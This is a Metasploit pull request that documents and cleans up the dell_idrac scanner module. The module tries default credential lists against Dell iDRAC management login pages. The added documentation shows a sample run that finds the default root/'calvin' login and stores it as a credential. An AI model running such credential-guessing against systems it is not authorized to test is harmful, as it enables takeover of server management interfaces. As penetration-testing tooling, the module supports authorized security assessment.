### PR TITLE
idrac docs and cleanup

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/dell_idrac.md
+++ b/documentation/modules/auxiliary/scanner/http/dell_idrac.md
@@ -1,0 +1,53 @@
+## Vulnerable Application
+
+This module attempts to login to a iDRAC webserver instance using
+default username and password.  Tested against Dell Remote Access:
+
+- Controller 6 - Express version 1.50 and 1.85,
+- Controller 7 - Enterprise 2.63.60.62
+
+## Verification Steps
+
+1. Setup the Dell iDRAC
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/dell_idrac`
+1. Do: `set rhosts [ip]`
+1. Do: `run`
+1. You should see attempts to login.
+
+## Options
+
+## Scenarios
+
+### iDRAC Controller 7 - Enterprise 2.63.60.62
+
+```
+msf6 > use auxiliary/scanner/http/dell_idrac
+msf6 auxiliary(scanner/http/dell_idrac) > set verbose true
+verbose => true
+msf6 auxiliary(scanner/http/dell_idrac) > set rhosts 222.222.2.22
+rhosts => 222.222.2.22
+msf6 auxiliary(scanner/http/dell_idrac) > run
+
+[*] Verifying that login page exists at 222.222.2.22
+[*] Attempting authentication
+[+] https://222.222.2.22:443/ - SUCCESSFUL login for user 'root' with password 'calvin'
+[-] https://222.222.2.22:443/ - Dell iDRAC - Failed to login as 'user1' with password 'calvin'
+[-] https://222.222.2.22:443/ - Dell iDRAC - Failed to login as 'user1' with password '123456'
+[-] https://222.222.2.22:443/ - Dell iDRAC - Failed to login as 'user1' with password 'password'
+[-] The connection timed out (222.222.2.22:443).
+[-] https://222.222.2.22:443/ - Dell iDRAC - Failed to login as 'admin' with password 'calvin'
+[-] The connection timed out (222.222.2.22:443).
+[-] https://222.222.2.22:443/ - Dell iDRAC - Failed to login as 'admin' with password '123456'
+[-] The connection timed out (222.222.2.22:443).
+[-] https://222.222.2.22:443/ - Dell iDRAC - Failed to login as 'admin' with password 'password'
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/dell_idrac) > creds
+Credentials
+===========
+
+host          origin        service          public  private  realm  private_type  JtR Format
+----          ------        -------          ------  -------  -----  ------------  ----------
+222.222.2.22  222.222.2.22  443/tcp (https)  root    calvin          Password      
+```

--- a/modules/auxiliary/scanner/http/dell_idrac.rb
+++ b/modules/auxiliary/scanner/http/dell_idrac.rb
@@ -15,7 +15,8 @@ class MetasploitModule < Msf::Auxiliary
       'Description' => %q{
         This module attempts to login to a iDRAC webserver instance using
         default username and password.  Tested against Dell Remote Access
-        Controller 6 - Express version 1.50 and 1.85
+        Controller 6 - Express version 1.50 and 1.85,
+        Controller 7 - Enterprise 2.63.60.62
       },
       'Author' =>
         [
@@ -30,28 +31,32 @@ class MetasploitModule < Msf::Auxiliary
 
     register_options([
       OptString.new('TARGETURI', [true, 'Path to the iDRAC Administration page', '/data/login']),
-      OptPath.new('USER_FILE',  [ false, "File containing users, one per line",
-        File.join(Msf::Config.data_directory, "wordlists", "idrac_default_user.txt") ]),
-      OptPath.new('PASS_FILE',  [ false, "File containing passwords, one per line",
-        File.join(Msf::Config.data_directory, "wordlists", "idrac_default_pass.txt") ]),
-      OptInt.new('RPORT', [true, "Default remote port", 443])
+      OptPath.new('USER_FILE', [
+        false, 'File containing users, one per line',
+        File.join(Msf::Config.data_directory, 'wordlists', 'idrac_default_user.txt')
+      ]),
+      OptPath.new('PASS_FILE', [
+        false, 'File containing passwords, one per line',
+        File.join(Msf::Config.data_directory, 'wordlists', 'idrac_default_pass.txt')
+      ]),
+      OptInt.new('RPORT', [true, 'Default remote port', 443])
     ])
 
     register_advanced_options([
-      OptBool.new('SSL', [true, "Negotiate SSL connection", true])
+      OptBool.new('SSL', [true, 'Negotiate SSL connection', true])
     ])
   end
 
   def target_url
-    proto = "http"
-    if rport == 443 or ssl
-      proto = "https"
+    proto = 'http'
+    if (rport == 443) || ssl
+      proto = 'https'
     end
     uri = normalize_uri(datastore['URI'])
     "#{proto}://#{vhost}:#{rport}#{uri}"
   end
 
-  def do_login(user=nil, pass=nil)
+  def do_login(user = nil, pass = nil)
 
     uri = normalize_uri(target_uri.path)
     auth = send_request_cgi({
@@ -64,7 +69,7 @@ class MetasploitModule < Msf::Auxiliary
       }
     })
 
-    if(auth and auth.body.to_s.match(/<authResult>[0|5]<\/authResult>/) != nil )
+    if (auth && !auth.body.to_s.match(%r{<authResult>[0|5]</authResult>}).nil?)
       print_good("#{target_url} - SUCCESSFUL login for user '#{user}' with password '#{pass}'")
       report_cred(
         ip: rhost,
@@ -100,6 +105,7 @@ class MetasploitModule < Msf::Auxiliary
     login_data = {
       core: create_credential(credential_data),
       status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      last_attempted_at: DateTime.now,
       proof: opts[:proof]
     }.merge(service_data)
 
@@ -113,27 +119,26 @@ class MetasploitModule < Msf::Auxiliary
       res = send_request_raw({
         'method' => 'GET',
         'uri' => uri
-        })
+      })
 
-      if (res and res.code == 200 and res.body.to_s.match(/<authResult>1/) != nil)
-        print_status("Attempting authentication")
+      if (res && (res.code == 200) && !res.body.to_s.match(/<authResult>1/).nil?)
+        print_status('Attempting authentication')
 
-        each_user_pass { |user, pass|
+        each_user_pass do |user, pass|
           do_login(user, pass)
-        }
+        end
 
-      elsif (res and res.code == 301)
+      elsif (res && (res.code == 301))
         print_error("#{target_url} - Page redirect to #{res.headers['Location']}")
         return :abort
       else
         print_error("The iDRAC login page does not exist at #{ip}")
         return :abort
       end
-
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
     rescue ::Timeout::Error, ::Errno::EPIPE
     rescue ::OpenSSL::SSL::SSLError => e
-      return if(e.to_s.match(/^SSL_connect /) ) # strange errors / exception if SSL connection aborted
+      return if (e.to_s.match(/^SSL_connect /)) # strange errors / exception if SSL connection aborted
     end
   end
 end


### PR DESCRIPTION
This pr adds:
1. docs for `scanner/http/dell_idrac`
2. `rubocop -a` on the module
3. adds required field `last_attempted_at` for `create_credential_login` so it doesn't fail.
4. updates the info to show it ran on my idrac 7
